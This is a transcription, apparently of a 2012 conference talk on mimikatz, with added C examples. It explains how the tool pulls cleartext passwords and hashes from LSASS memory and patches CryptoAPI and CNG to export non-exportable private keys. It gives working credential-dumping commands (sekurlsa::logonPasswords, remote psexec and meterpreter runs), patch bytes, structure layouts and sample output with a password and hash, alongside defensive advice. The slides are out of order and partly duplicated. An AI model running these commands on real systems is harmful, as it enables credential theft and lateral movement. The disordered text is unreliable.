CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After the patch:

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz crypto: memo

Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit

Password
– PFX files are protected by this password: mimikatz

Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys.
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it.
mimikatz crypto: what we can do

Exactly the same as for sekurlsa: what prevents this is preventing access to the accounts / computer
– no admin, no admin, no admin…

Basics
– Use smartcards / tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM

More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendor implementations (Lenovo, Dell, …) of TPM CSP / KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?

– Play with minesweeper
– Manipulate some handles
– Pass the hash
– Dump SAM / AD
– Stop event monitoring
– Patch Terminal Server
– Basic GPO bypass
– AppLocker / SRP bypass
– Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilters / actions
  • List notifications (process, thread, image, registry)
  • List object hooks and procedures
  • …
– …
mimikatz: that's all folks

Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal / acceptable
– Security friends / community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention

Questions?
Don't be shy :)
especially if you have written the corresponding slide number
Blog, Source Code & Contact

blog     : http://blog.gentilkiwi.com
mimikatz : http://blog.gentilkiwi.com/mimikatz
source   : https://code.google.com/p/mimikatz
email    : benjamin@gentilkiwi.com
mimikatz sekurlsa / livessp: how

Let's log in with a Live account on Windows 8.
After credentials protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest).

Call stacks from the slide (innermost frame first):
  lsasrv!LsaProtectMemory ← livessp!LiveMakeSupplementalCred ← livessp!LiveMakeSecPkgCredentials ← livessp!LsaApLogonUserEx2 ← livessp!SpiLogonUserEx2   (our LiveSSP provider)
  lsasrv!LsaProtectMemory ← msv1_0!NlpAddPrimaryCredential ← msv1_0!SspAcceptCredentials ← msv1_0!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← tspkg!TSHidePassword ← tspkg!SpAcceptCredentials

1: kd> uf /c livessp!LsaApLogonUserEx2
livessp!LsaApLogonUserEx2 (74781536)
  […]
  livessp!LsaApLogonUserEx2+0x560 (74781a96):
    call to livessp!LiveCreateLogonSession (74784867)

Yeah, pass-the-hash capability with Live accounts too… Live users can log on through RDP via SSO.
mimikatz sekurlsa / livessp: workflow

LsaEnumerateLogonSessions → for each LUID → search the linked list livessp!LiveGlobalLogonSessionList for the LUID → KIWI_LIVESSP_LIST_ENTRY → suppCreds (KIWI_LIVESSP_PRIMARY_CREDENTIAL) → LsaUnprotectMemory → password in clear

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
    DWORD unk4;
    DWORD unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

mimikatz sekurlsa

Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me: yes!
mimikatz sekurlsa / kerberos

Let's log in with a normal account.
After credentials protection, KerbCreateLogonSession calls:
– NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
– NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList

Call stacks from the slide (innermost frame first):
  lsasrv!LsaProtectMemory ← kerberos!KerbHideKey ← kerberos!KerbCreatePrimaryCredentials ← kerberos!KerbCreateLogonSession ← kerberos!SpAcceptCredentials   (Kerberos ticket part? Maybe ;))
  lsasrv!LsaProtectMemory ← kerberos!KerbHidePassword ← kerberos!KerbCreateLogonSession ← kerberos!SpAcceptCredentials   (Kerberos part for the password)
  lsasrv!LsaProtectMemory ← msv1_0!NlpAddPrimaryCredential ← msv1_0!SspAcceptCredentials ← msv1_0!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← wdigest!SpAcceptCredentials
  lsasrv!LsaProtectMemory ← tspkg!TSHidePassword ← tspkg!SpAcceptCredentials
mimikatz sekurlsa / kerberos (nt6): workflow

LsaEnumerateLogonSessions → for each LUID → RtlLookupElementGenericTableAvl on kerberos!KerbGlobalLogonSessionTable → KIWI_KERBEROS_PRIMARY_CREDENTIAL → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
    DWORD unk0;
    PVOID unk1;
    PVOID unk2;
    PVOID unk3;
#ifdef _M_X64
    BYTE unk4[32];
#elif defined _M_IX86
    BYTE unk4[20];
#endif
    LUID LocallyUniqueIdentifier;
#ifdef _M_X64
    BYTE unk5[44];
#elif defined _M_IX86
    BYTE unk5[36];
#endif
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz sekurlsa / kerberos (nt5): workflow

LsaEnumerateLogonSessions → for each LUID → search the linked list kerberos!KerbLogonSessionList for the LUID → KIWI_KERBEROS_LOGON_SESSION → LsaUnprotectMemory → password in clear

typedef struct _KIWI_KERBEROS_LOGON_SESSION {
    struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
    struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
    DWORD UsageCount;
    PVOID unk0;
    PVOID unk1;
    PVOID unk2;
    DWORD unk3;
    DWORD unk4;
    PVOID unk5;
    PVOID unk6;
    PVOID unk7;
    LUID LocallyUniqueIdentifier;
#ifdef _M_IX86
    DWORD unk8;
#endif
    DWORD unk9;
    DWORD unk10;
    PVOID unk11;
    DWORD unk12;
    DWORD unk13;
    PVOID unk14;
    PVOID unk15;
    PVOID unk16;
    […]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
} KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
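The "search linked list for LUID" step is the same for the livessp workflow (KIWI_LIVESSP_LIST_ENTRY → suppCreds) and for the NT5 kerberos list above: LsaEnumerateLogonSessions hands back LUIDs, and the package's global LIST_ENTRY has to be walked until an entry with that LUID turns up. The C below is an added example written for this page, not mimikatz's own code. It uses the livessp layouts from the slide, builds a constructed list in the current process (names reuse the ones from the logonPasswords output on this page; the LUIDs are made up), and shows the two details that bite when doing this against a memory image: the head is a sentinel that must terminate the walk, and LSA_UNICODE_STRING.Length is a byte count with no NUL terminator. A real reader copies each node out of lsass instead of dereferencing local pointers, and the Password field it finds still has to go through LsaUnprotectMemory; no decryption is attempted here.

```c
/* Added example, not mimikatz code: the LUID lookup on a LIST_ENTRY-style
 * package list, using the KIWI_LIVESSP_* layouts from the slide. All data is
 * constructed in this process for the demonstration. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

typedef uint32_t DWORD;
typedef int32_t  LONG;
typedef uint16_t USHORT;
typedef uint16_t WCHAR;     /* Windows WCHAR is 16-bit UTF-16, unlike Linux wchar_t */
typedef void    *PVOID;

typedef struct _LUID { DWORD LowPart; LONG HighPart; } LUID;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;          /* in BYTES, not characters, and not NUL-terminated */
    USHORT MaximumLength;
    WCHAR *Buffer;
} LSA_UNICODE_STRING;

typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
    DWORD isSupp;
    DWORD unk0;
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;   /* LsaProtectMemory output inside lsass */
} KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;

typedef struct _KIWI_LIVESSP_LIST_ENTRY {
    struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
    struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
    PVOID unk0, unk1, unk2, unk3;
    DWORD unk4, unk5;
    PVOID unk6;
    LUID LocallyUniqueIdentifier;
    LSA_UNICODE_STRING UserName;
    PVOID unk7;
    PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
} KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

static int luid_equal(const LUID *a, const LUID *b)
{
    return a->LowPart == b->LowPart && a->HighPart == b->HighPart;
}

/* Walk the circular list whose sentinel head is `head` (LiveGlobalLogonSessionList
 * in lsass). Flink/Blink sit at offset 0 of every node, so the head is
 * addressable as an entry; the walk stops when it is back at the head, so an
 * unknown LUID returns NULL instead of spinning forever. suppCreds may itself
 * be NULL for a session without supplemental credentials. */
const KIWI_LIVESSP_PRIMARY_CREDENTIAL *find_livessp_creds(const KIWI_LIVESSP_LIST_ENTRY *head,
                                                          const LUID *luid)
{
    for (const KIWI_LIVESSP_LIST_ENTRY *e = head->Flink; e && e != head; e = e->Flink)
        if (luid_equal(&e->LocallyUniqueIdentifier, luid))
            return e->suppCreds;
    return NULL;
}

/* Narrow a UTF-16LE LSA_UNICODE_STRING to ASCII using Length/2 characters,
 * never strlen. Non-ASCII code units become '?'. Returns characters written. */
size_t lsa_string_to_ascii(const LSA_UNICODE_STRING *s, char *out, size_t cap)
{
    size_t n = s->Length / sizeof(WCHAR);
    if (n + 1 > cap)
        n = cap - 1;
    for (size_t i = 0; i < n; i++)
        out[i] = s->Buffer[i] < 0x80 ? (char)s->Buffer[i] : '?';
    out[n] = '\0';
    return n;
}

/* Build an LSA_UNICODE_STRING over caller-provided WCHAR storage (constructed data). */
static LSA_UNICODE_STRING make_ustr(const char *ascii, WCHAR *storage)
{
    size_t n = strlen(ascii);
    for (size_t i = 0; i < n; i++)
        storage[i] = (WCHAR)(unsigned char)ascii[i];
    LSA_UNICODE_STRING s = { (USHORT)(n * sizeof(WCHAR)), (USHORT)(n * sizeof(WCHAR)), storage };
    return s;
}

/* Constructed list: sentinel head + two sessions. Looks up `luid_low` and returns
 * the length of the user name found in its supplemental credentials, or -1 when
 * the LUID is absent or the session carries no suppCreds. */
int demo_lookup_user_len(DWORD luid_low)
{
    static WCHAR u1[16], d1[16], p1[16], u2[16];
    static KIWI_LIVESSP_PRIMARY_CREDENTIAL c1;
    static KIWI_LIVESSP_LIST_ENTRY head, e1, e2;

    c1.isSupp   = 1;
    c1.UserName = make_ustr("Gentil Kiwi", u1);
    c1.Domaine  = make_ustr("vm-w8-rp-x", d1);
    c1.Password = make_ustr("<protected>", p1);      /* stands in for protected bytes */
    e1.LocallyUniqueIdentifier = (LUID){ 0x3956F6, 0 }; /* made-up LUID */
    e1.UserName  = c1.UserName;
    e1.suppCreds = &c1;
    e2.LocallyUniqueIdentifier = (LUID){ 0x12345, 0 };  /* made-up LUID, no suppCreds */
    e2.UserName  = make_ustr("Other User", u2);
    e2.suppCreds = NULL;
    head.Flink = &e1; e1.Flink = &e2; e2.Flink = &head;  /* circular, head is sentinel */
    head.Blink = &e2; e2.Blink = &e1; e1.Blink = &head;

    LUID want = { luid_low, 0 };
    const KIWI_LIVESSP_PRIMARY_CREDENTIAL *c = find_livessp_creds(&head, &want);
    if (!c)
        return -1;
    char buf[32];
    return (int)lsa_string_to_ascii(&c->UserName, buf, sizeof buf);
}

int main(void)
{
    printf("LUID 0x3956F6 -> user name length %d\n", demo_lookup_user_len(0x3956F6));
    printf("LUID 0xDEAD   -> %d (not found)\n", demo_lookup_user_len(0xDEAD));
    return 0;
}
```

Against a real lsass the walk is the same, but every `Flink` and `suppCreds` value is an address in the other process and has to be read with ReadProcessMemory before it is followed; the termination condition then compares remote addresses, not local pointers.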
mimikatz sekurlsa: demo time

Final sekurlsa demo: sekurlsa::logonPasswords full
mimikatz sekurlsa / kerberos: "hu?"

OK, it works… but why?
Not at every logon on NT5 (an unlock may be needed).

From my understanding of Microsoft's explanations:
– no need of passwords for the Kerberos protocol…
– all is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logic…
– For password auth:
  • password hash for the shared secret, but keeping the password in memory
– For full smartcard auth:
  • No password on client
  • No hash on client
  – NTLM hash on client anyway… the KDC sent it back as a gift!
mimikatz sekurlsa

All passwords in memory are encrypted, but in a reversible way, so that they can be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them.
– This function relies on LsaEncryptMemory from lsasrv.dll
For that we previously injected a DLL (sekurlsa.dll) into the LSASS process, to take advantage of its keys when we called it.

Can it be fun to decrypt outside the process?
– Yes it is… no more injection, just reading the memory of the LSASS process…
mimikatz can load lsasrv.dll too and "imports" the keys LSASS initialized
– When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS, we get the same behaviour as when we are inside LSASS.
mimikatz sekurlsa / LsaEncryptMemory NT5

Depending on the size of the secret, LsaEncryptMemory uses:
– RC4
– DESX

Figure: key material in lsass (lsasrv.dll) and its copy ("copy…") into the lsasrv.dll instance loaded by mimikatz, which then calls LsaUnprotectMemory with the imported keys:
  g_cbRandomKey   DWORD = 256
  g_pRandomKey    → BYTE[g_cbRandomKey]
  g_pDESXKey      → BYTE[144]
  g_Feedback      BYTE[8]
mimikatz sekurlsa / LsaEncryptMemory NT6

Depending on the size of the secret, LsaEncryptMemory uses:
– 3DES
– AES

Figure: key material in lsass (lsasrv.dll) and its copy ("copy…") into mimikatz:
  InitializationVector   BYTE[16]
  h3DesKey               → KIWI_BCRYPT_KEY → KIWI_BCRYPT_KEY_DATA
  hAesKey                → KIWI_BCRYPT_KEY → KIWI_BCRYPT_KEY_DATA

typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;
    DWORD tag;
    DWORD type;
    DWORD unk0;
    DWORD unk1;
    DWORD unk2;
    DWORD unk3;
    PVOID unk4;
    BYTE data;   /* etc. */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;
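The two NT6 structures above are what the symbols lsasrv!h3DesKey and lsasrv!hAesKey point at: not the key itself, but a handle whose `cle` field leads to a second structure that carries the key bytes. The C below is an added example for this page, not mimikatz code. It follows that chain the way the "copy…" arrow on the slide does, and encodes the size-based choice between the two ciphers for both the NT5 (RC4 / DESX) and NT6 (3DES / AES) slides. Several things are assumptions, flagged in the comments: the concrete dispatch rule (the slides only say "depending on the size"), the key length being `size` minus the header (the slide names no length field), the tag value used, and the 8- versus 16-byte IV consumption. The structures are built in the current process with constructed bytes; a real reader copies each one from lsass and re-reads the `cle` pointer from the copied handle.

```c
/* Added example, not mimikatz's own code: following hKey -> cle -> data to
 * copy an LSA protection key out, plus the size-based cipher dispatch for the
 * NT5 and NT6 LsaEncryptMemory. All data is constructed in-process. */
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

typedef uint32_t DWORD;
typedef uint8_t  BYTE;
typedef void    *PVOID;

/* Layouts as given on the slide. */
typedef struct _KIWI_BCRYPT_KEY_DATA {
    DWORD size;                 /* assumption: header + key bytes (see lsa_nt6_copy_key) */
    DWORD tag;
    DWORD type;
    DWORD unk0, unk1, unk2, unk3;
    PVOID unk4;
    BYTE  data[];               /* key bytes start here ("BYTE data; etc." on the slide) */
} KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;

typedef struct _KIWI_BCRYPT_KEY {
    DWORD size;
    DWORD type;
    PVOID unk0;
    PKIWI_BCRYPT_KEY_DATA cle;  /* "clé": where the key material really is */
    PVOID unk1;
} KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

typedef enum { LSA_NT5_RC4, LSA_NT5_DESX } lsa_nt5_cipher;
typedef enum { LSA_NT6_3DES, LSA_NT6_AES } lsa_nt6_cipher;

/* The slides say only "depending on the size of the secret". The rule encoded
 * here is an assumption, not something the slides state: a multiple of 8 bytes
 * goes to the block cipher used without padding (DESX on NT5, 3DES on NT6);
 * anything else goes to the cipher that copes with arbitrary lengths (RC4, and
 * AES in a stream-like chaining mode). LSA_UNICODE_STRING passwords are 2 bytes
 * per character, so an 8-character password (16 bytes) and a 9-character one
 * (18 bytes) take different paths. */
lsa_nt5_cipher lsa_nt5_cipher_for(size_t cb) { return (cb % 8) ? LSA_NT5_RC4 : LSA_NT5_DESX; }
lsa_nt6_cipher lsa_nt6_cipher_for(size_t cb) { return (cb % 8) ? LSA_NT6_AES : LSA_NT6_3DES; }

/* Bytes of lsasrv!InitializationVector (BYTE[16]) a cipher consumes: one block,
 * 8 for 3DES and 16 for AES (assumption, matching the two block sizes). */
size_t lsa_nt6_iv_len(lsa_nt6_cipher c) { return c == LSA_NT6_3DES ? 8 : 16; }

/* The "copy..." arrow: hKey -> cle -> data. Key length is taken as size minus
 * the header (assumption: the slide names no explicit length field). Returns
 * the number of key bytes copied, 0 when the chain or the tag is wrong. */
size_t lsa_nt6_copy_key(const KIWI_BCRYPT_KEY *hkey, DWORD expect_tag,
                        BYTE *out, size_t cap)
{
    const size_t hdr = offsetof(KIWI_BCRYPT_KEY_DATA, data);
    if (!hkey || !hkey->cle)
        return 0;
    const KIWI_BCRYPT_KEY_DATA *kd = hkey->cle;
    if (kd->tag != expect_tag || kd->size <= hdr)
        return 0;
    size_t len = kd->size - hdr;
    if (len > cap)
        return 0;
    memcpy(out, kd->data, len);
    return len;
}

#define DEMO_TAG 0x4B53534Du   /* constructed tag value for this demo */

/* Constructed stand-in for what sits behind lsasrv!h3DesKey: a handle whose
 * `cle` points at a blob carrying a 24-byte (3DES-sized) key with constructed
 * bytes A0..B7. Returns 24 on success and leaves the key in `out`. */
size_t demo_copy_3des_key(BYTE *out, size_t cap)
{
    const size_t hdr = offsetof(KIWI_BCRYPT_KEY_DATA, data);
    KIWI_BCRYPT_KEY_DATA *kd = calloc(1, hdr + 24);
    if (!kd)
        return 0;
    kd->size = (DWORD)(hdr + 24);
    kd->tag  = DEMO_TAG;
    kd->type = 1;
    for (int i = 0; i < 24; i++)
        kd->data[i] = (BYTE)(0xA0 + i);
    KIWI_BCRYPT_KEY h = { (DWORD)sizeof h, 1, NULL, kd, NULL };
    size_t len = lsa_nt6_copy_key(&h, DEMO_TAG, out, cap);
    free(kd);
    return len;
}

int main(void)
{
    BYTE key[32];
    size_t n = demo_copy_3des_key(key, sizeof key);
    printf("copied %zu key bytes; 16-byte secret -> %s, 18-byte secret -> %s\n", n,
           lsa_nt6_cipher_for(16) == LSA_NT6_3DES ? "3DES" : "AES",
           lsa_nt6_cipher_for(18) == LSA_NT6_3DES ? "3DES" : "AES");
    return 0;
}
```

The point of the tag and size checks is that the symbol resolution can be wrong by a few bytes on an unexpected lsasrv.dll build; validating the second structure before copying is what tells you the chain was followed correctly rather than silently importing garbage as a key.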
mimikatz sekurlsa: memo

Security Packages
Package          Symbols                                                   Type
tspkg            tspkg!TSGlobalCredTable                                   RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                                     LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList                        LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList                             LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                      RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount    LIST_ENTRY / ULONG

Protection Keys
Key     NT 5 symbols
RC4     lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
DESx    lsasrv!g_pDESXKey, lsasrv!g_Feedback

Key     NT 6 symbols
        lsasrv!InitializationVector
3DES    lsasrv!h3DesKey
AES     lsasrv!hAesKey
mimikatz sekurlsa: memo

Some commands:
mimikatz privilege::debug sekurlsa::logonPasswords full exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC)	/* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request to ACTIVATE privilege: SeDebugPrivilege: OK

mimikatz # sekurlsa::logonPasswords full
Authentication Id       : 0;234870
Authentication package  : NTLM
Primary user            : Gentil Kiwi
Authentication domain   : vm-w8-rp-x
	msv1_0 :
	 * User      : Gentil Kiwi
	 * Domain    : vm-w8-rp-x
	 * LM hash   : d0e9aee149655a6075e4540af1f22d3b
	 * NTLM hash : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * User      : Gentil Kiwi
	 * Domain    : vm-w8-rp-x
	 * Password  : waza1234
	wdigest :
	 * User      : Gentil Kiwi
	 * Domain    : vm-w8-rp-x
	 * Password  : waza1234
	tspkg :
	 * User      : Gentil Kiwi
	 * Domain    : vm-w8-rp-x
	 * Password  : waza1234
	livessp : not found (LUID KO)
mimikatz sekurlsa: what we can do

Basics
– No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass-the-hash leaves traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs
– Use a separate network (or forest) for privileged tasks

More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– Nothing exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication, push public / private stuff (like keys ;))
– Take every opportunity to drop backward compatibility
– Disable faulty providers
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz crypto: what is it?

A little module that I wrote to:
– play with the Windows Cryptographic API, CNG and RSA keys
– automate the export of certificates / keys
  • even those which are "not" exportable

What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public part in DER format
    – with private keys in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in the mimikatz context
  • CNG in the LSASS context (again ;))

(module: mod_mimikatz_crypto)
mimikatz crypto: how it's protected

Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • at least not without the master keys and/or the users' passwords
Computer / user can load their own keys because they have enough secrets to do it (e.g. an opened session)
– Yes, a computer / server opens a "session" too

Export / usage can be limited by:
– Password   (a constraint for most users; unavailable for computer keys)
– Popup      (a constraint for most users; unavailable for computer keys)
– Export / Archive flag not present

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz crypto / capi: how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." – http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader, …
– cryptdll.dll, rsaenh.dll, …
The process deals with cryptographic keys through this API…

mimikatz crypto / capi: how it's exported (… level)

Figure: CryptoAPI export flow, entirely inside the calling process. Process → CryptoAPI and RSA CSP → load private key → DPAPI decode → "Exportable?" (ask to export key) → yes: exported key / no: NTE_BAD_KEY_STATE. ("PLAYSKOOL" label from the slide.)
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) it goes in rsaenhCPExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 42 42
mimikatz # crypto::exportCertificates
Emplacement : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Container Clé  : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Type           : AT_KEYEXCHANGE
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans  'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Clé non valide pour l'utilisation dans l'état spécifié.
        Export public dans 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificat 0 ================
Numéro de série : 112169417a1c3ef46a301f99385f50680fa0
Émetteur : CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Objet : CN=Benjamin Delpy, C=FR
Il ne s'agit pas d'un certificat racine
Hach. cert. (sha1) : ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Conteneur de clé = 470ADFBA-8718-4014-B05E-B30776B75A03
  Fournisseur = Microsoft Enhanced Cryptographic Provider v1.0
La clé privée NE PEUT PAS être exportée
Succès du test de cryptage
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.
mimikatz :: crypto :: patchcapi – because I own my process

So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space...
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz continue_key_export_or_archive
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz continue_key_export_or_archive_prepare
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi – demo time

Import, export, import as not exportable... export.
mimikatz :: crypto :: patchcapi – limitations

Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve, a little...

mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz :: crypto :: cng – how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context.
The process uses RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
– It is, but it's not perfect...
mimikatz :: crypto :: cng – how it's exported ( level)

[Diagram, slide 47: CNG export flow. Process → CNG → RPC → KeyIso Service (LSASS process; NT6 system protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP) → "Ask to export Key" → "Exportable?" → yes: DPAPI Decode → Load Private Key → Exported Key (PLAYSKOOL); no: NTE_NOT_SUPPORTED]

mimikatz :: crypto :: patchcng – because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), RPC calls lead to lsass (keyiso) → ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks if the key is exportable.
mimikatz # crypto::exportKeys [user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportabilité  : NON
        Taille clé     : 2048
        Export privé dans  'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
